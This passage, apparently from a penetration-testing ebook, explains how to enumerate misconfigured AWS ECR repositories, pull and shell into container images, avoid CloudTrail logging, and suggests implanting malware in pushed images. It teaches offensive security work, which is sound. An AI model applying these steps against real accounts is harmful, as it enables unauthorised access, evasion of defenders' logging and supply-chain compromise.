Elastic Container Registry (ECR)

ECR is described as a fully managed Docker container registry that makes it easy for developers to store, manage, and deploy Docker container images (https://aws.amazon.com/ecr/). The permissions model that it uses can allow for some nasty misconfigurations if a repository isn't set up correctly, mainly because, by design, ECR repositories can be made public or shared with other accounts. This means that, even if we only have a small amount of access, a misconfigured repository could grant us large amounts of access to an environment, depending on what is stored in the Docker images it is hosting.

If we are targeting public repositories in another account, then the main piece of information we need is the account ID of where the repositories are. There are a few ways of getting it. If you have credentials for the account you are targeting, the easiest way is to use the Simple Token Service (STS) GetCallerIdentity API, which will provide you with some information that includes your account ID. That command would look like this:

aws sts get-caller-identity

The problem with this is that it is logged to CloudTrail and clearly shows that you are trying to gather information about your user/the account you're in, which could raise some red flags for a defender. There are other methods as well, particularly based around research from Rhino Security Labs, where they released a script to enumerate a small amount of information about the current account without ever touching CloudTrail. This was done through verbose error messages that certain services disclose, and those services aren't supported by CloudTrail yet, so there was no record of the API call being made, but the user gathered some information, including the account ID (https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).

If you are targeting repositories in the account that you have compromised and are using those credentials for these API calls, then the account ID won't matter, because it will default to the current account automatically in most cases. The first thing we will want to do is list out the repositories in the account. This can be done with the following command (if you are targeting a different account, pass the account ID in to the --registry-id argument):

aws ecr describe-repositories --region us-west-2

This should list out the repositories in the current region, including their ARN, registry ID, name, URL, and when they were created. Our example returned the following output:

{
"repositories": [
{
"repositoryArn": "arn:aws:ecr:us-west-2:000000000000:repository/example-repo",
"registryId": "000000000000",
"repositoryName": "example-repo",
"repositoryUri": "000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo",
"createdAt": 1545935093.0
}
]
}

We can then fetch all of the images stored in that repository with the ListImages command. That will look something like this for the example-repo we found previously:

aws ecr list-images --repository-name example-repo --region us-west-2

This command will give us a list of images, including their digest and image tag:

{
"imageIds": [
{
"imageDigest": "sha256:afre1386e3j637213ab22f1a0551ff46t81aa3150cbh3b3a274h3d10a540r268",
"imageTag": "latest"
}
]
}

Now we can (hopefully) pull this image to our local machine and run it, so that we can see what's inside. We can do this by running the following command (again, specify an external account ID in the --registry-id parameter if needed):

$(aws ecr get-login --no-include-email --region us-west-2)

The AWS command returns the required docker command to log you into the target registry, and the $() around it will automatically execute that command and log you in. You should see Login Succeeded printed to the console after running it. Next, we can use Docker to pull the image, now that we are authenticated with the repository:

docker pull 000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo:latest

Now the Docker image should get pulled and should be available if you run docker images to list the Docker images:

Listing the example-repo Docker image after pulling it down

Next, we will want to run this image and drop ourselves into a bash shell within it, so then we can explore the filesystem and look for any goodies. We can do this with the following:

docker run -it --entrypoint /bin/bash 000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo:latest

Now our shell should switch from the local machine to the Docker container as the root user:

Using the Docker run command to enter a bash shell in the container we are launching

This is where you can employ your normal penetration testing techniques for searching around the operating system. You should be looking for things such as source code, configuration files, logs, environment files, or anything that sounds interesting, really.

If any of those commands failed due to authorization issues, we could go ahead and check the policy associated with the repository we are targeting. This can be done with the GetRepositoryPolicy command:

aws ecr get-repository-policy --repository-name example-repo --region us-west-2

The response will be an error if no policy has been created for the repository; otherwise, it will return a JSON policy document that specifies what AWS principals can execute what ECR commands against the repository. You might find that only certain accounts or users are able to access the repository, or you might find that anyone can access it (such as if the "*" principal is allowed).

If you have the correct push permissions to ECR, another attack worth trying would be to implant malware in one of the existing images, then push an update to the repository so that anyone who then uses that image will launch it with your malware running. Depending on the workflow the target uses behind the scenes, it may take a long time to discover this kind of backdoor in their images if done correctly.

If you are aware of applications/services being deployed with these Docker images, such as through Elastic Container Service (ECS), then it might be worth looking for vulnerabilities within the container that you might be able to externally exploit, to then gain access to those servers. To help with this, it might be useful to do static vulnerability analysis on the various containers using tools such as Anchore Engine (https://github.com/anchore/anchore-engine), Clair (https://github.com/coreos/clair), or any others of the many available online. The results from those scans could help you identify known vulnerabilities that you might be able to take advantage of.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.119.139.50